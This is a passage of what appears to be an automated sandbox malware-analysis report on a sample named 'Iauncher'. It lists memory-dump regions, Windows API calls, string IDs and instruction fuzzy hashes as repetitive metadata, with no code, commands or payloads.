                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Initialize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2538663250-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,075EF6E7,00000000,03A1411C,02A5D8EC,00000000,?), ref: 075EFD75
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,075EF6E7,00000000,03A1411C,02A5D8EC,00000000,?), ref: 075EFD75
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 05DB126A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: TextWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 530164218-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,075EF65A,00000000,00000000,03A1411C,02A5D8EC), ref: 075EFAA8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePeek
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2222842502-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 075E9E25
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 075E9E25
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SetTimer.USER32(?,01046428,?,?), ref: 09BF22DD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Timer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2870079774-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0101D806
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3676074296.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1010000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,?,?,?,?,?,?,?,05DB1D39,?,?,00000000), ref: 05DB1DAD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DispatchMessage
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2061451462-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 075EA845
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Initialize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2538663250-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,?,?,?), ref: 05DB17FD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,?,?,?), ref: 05DB17FD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SetTimer.USER32(?,01046428,?,?), ref: 09BF22DD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Timer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2870079774-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DispatchMessage
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2061451462-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,?,?,?,?,?,?,?,05DB1D39,?,?,00000000), ref: 05DB1DAD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (q
                                                                                                                                                    • API String ID: 0-2414175341
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (q
                                                                                                                                                    • API String ID: 0-2414175341
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (q
                                                                                                                                                    • API String ID: 0-2414175341
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (q
                                                                                                                                                    • API String ID: 0-2414175341
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e529710ca4be4d2c64f17e706f2e70908f798fcedc94979eb8f0f619fcd0a839
                                                                                                                                                    • Instruction ID: d6ea5fc4453507d1aa3152788a59b2976c6e9bc88f16d8e6638f814fdd678c08
                                                                                                                                                    • Opcode Fuzzy Hash: e529710ca4be4d2c64f17e706f2e70908f798fcedc94979eb8f0f619fcd0a839
                                                                                                                                                    • Instruction Fuzzy Hash: 3731C2B4E002099FDB44DFA9D944AAEBBB6FF88300F109469E510A7364DB35AA41CF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1ef4058fb08eeadfeb511173c87d8858888af0aa471baaf611e43a13b18100c3
                                                                                                                                                    • Instruction ID: 84344cb265c5bdcfe34989a75a389749f74ba88c96c79edb63b32f9670db9fcf
                                                                                                                                                    • Opcode Fuzzy Hash: 1ef4058fb08eeadfeb511173c87d8858888af0aa471baaf611e43a13b18100c3
                                                                                                                                                    • Instruction Fuzzy Hash: DD21D3343406154BEB04AB6ED4517AE73E7EBC8B08F14403AE686D7788CDB9EC1297A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3674779733.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_d3d000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d5b90fc15124a79d5c9a0fc7e2a5178f4ffe993e0b43c63e4fa16075f0a330a4
                                                                                                                                                    • Instruction ID: 6edbf9625c71a2d6678df8301ffe95e6da4d6fe27c86c02225bbadb43c4c68a2
                                                                                                                                                    • Opcode Fuzzy Hash: d5b90fc15124a79d5c9a0fc7e2a5178f4ffe993e0b43c63e4fa16075f0a330a4
                                                                                                                                                    • Instruction Fuzzy Hash: 07210372504240DFDB15DF14E9C0B26BF66FB99328F248169E8490B256C336D856CEB2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: eef440500a22afe95952aa09569da23e5de3954e994f3d2a3a06ebeca40e98cd
                                                                                                                                                    • Instruction ID: 0b7760e24fb574408f1251f5825621b8d8cb92ebb8c5161a39b45cab6c3afb2b
                                                                                                                                                    • Opcode Fuzzy Hash: eef440500a22afe95952aa09569da23e5de3954e994f3d2a3a06ebeca40e98cd
                                                                                                                                                    • Instruction Fuzzy Hash: 3D31F132D14B09DACB01EFA8C8544A9F771FF95310B118B5AE59967121FB30E6D5CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3674923444.0000000000D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_d4d000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0361a65ae0ba4329d54c3e1bc013791be4fd3c8baee5ad31c60ce36bc2222228
                                                                                                                                                    • Instruction ID: a77aeeaa0fc7cce1b6981408b3237529556e5d534cefb0e12fa0d4f91a3acbbc
                                                                                                                                                    • Opcode Fuzzy Hash: 0361a65ae0ba4329d54c3e1bc013791be4fd3c8baee5ad31c60ce36bc2222228
                                                                                                                                                    • Instruction Fuzzy Hash: B5210471A04300EFDB15DF10D9C4B26BBA6FB84314F24C6ADE8494B396C3B6D846CA75
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3674923444.0000000000D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_d4d000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 08b7103039688a93eaf1180d1b1cb77dc69411996d77657a2ce19ec943864183
                                                                                                                                                    • Instruction ID: 16029944ad77656b2770deb5d7f2a6e95845dd804a593ae487045c7dbafd959d
                                                                                                                                                    • Opcode Fuzzy Hash: 08b7103039688a93eaf1180d1b1cb77dc69411996d77657a2ce19ec943864183
                                                                                                                                                    • Instruction Fuzzy Hash: 1A21C275604344DFDB24DF14D9C4B16BB66EB84314F24C5ADE84A4B396C33AD847CA72
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b33d7d7abe4503e77d3093065c67d8f92596a4b77f48c1d6ac68876730fc2e3c
                                                                                                                                                    • Instruction ID: bac9d863845f773871f5c72716ed3df3fae7c8437974a8f47ff626d6e5c5bda4
                                                                                                                                                    • Opcode Fuzzy Hash: b33d7d7abe4503e77d3093065c67d8f92596a4b77f48c1d6ac68876730fc2e3c
                                                                                                                                                    • Instruction Fuzzy Hash: E931DFB5D002499FCB14CFAAD885ADEFBF4FB48324F14842AE919A3310D775A941CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 362fc79715ed8fada1e8280253041a0bfbf4984c138f6b8326dc8eacf750d011
                                                                                                                                                    • Instruction ID: 0cd47907823ac096c4dd06a837c49796472719a615ec3af95ffcea5c079c557f
                                                                                                                                                    • Opcode Fuzzy Hash: 362fc79715ed8fada1e8280253041a0bfbf4984c138f6b8326dc8eacf750d011
                                                                                                                                                    • Instruction Fuzzy Hash: FE1154757105149FDB18CA59D844D9AB7F5FF8C310B1540B9E509E7361D631EC01CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 72276a6694f56be2c9a85a0283d74f9de87721c7f1b72ab75d2cac29eb49ee49
                                                                                                                                                    • Instruction ID: 5b75e1446538da1d72dab8af73d550ae10c4a76da6ebd66c2ec3b15f6cfa3f36
                                                                                                                                                    • Opcode Fuzzy Hash: 72276a6694f56be2c9a85a0283d74f9de87721c7f1b72ab75d2cac29eb49ee49
                                                                                                                                                    • Instruction Fuzzy Hash: 391173303406114BEB04AB6ED45176F72D7EBC9B04F14443AE686D7799CDB9EC0297A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c0e2d559e3618a05a80eabff341d008ad9a28068a6f8b05fca180e3fdb266fa3
                                                                                                                                                    • Instruction ID: e0cc8971661a5569fc6e0aba07645b58b05e507b1cfcf9141c8fab985f17352a
                                                                                                                                                    • Opcode Fuzzy Hash: c0e2d559e3618a05a80eabff341d008ad9a28068a6f8b05fca180e3fdb266fa3
                                                                                                                                                    • Instruction Fuzzy Hash: 4711D6B6E0011A9FCF01DF94DD506FFB7B6EFC8210B054816F854E3251E6719D2597A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3674923444.0000000000D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_d4d000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 53906468979d10763d79783cab55798dcba57719d95d799bce6edfc53a5c47cf
                                                                                                                                                    • Instruction ID: 6cdc4722b9912b0f26535a3f0fe376f6ba82a29f7b08ce7a8fd84768ec5460ce
                                                                                                                                                    • Opcode Fuzzy Hash: 53906468979d10763d79783cab55798dcba57719d95d799bce6edfc53a5c47cf
                                                                                                                                                    • Instruction Fuzzy Hash: 932162755093C08FCB16CF24D994715BF72EB46314F28C5EAD8498F6A7C33A984ACB62
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3674779733.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_d3d000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3674923444.0000000000D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_d4d000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
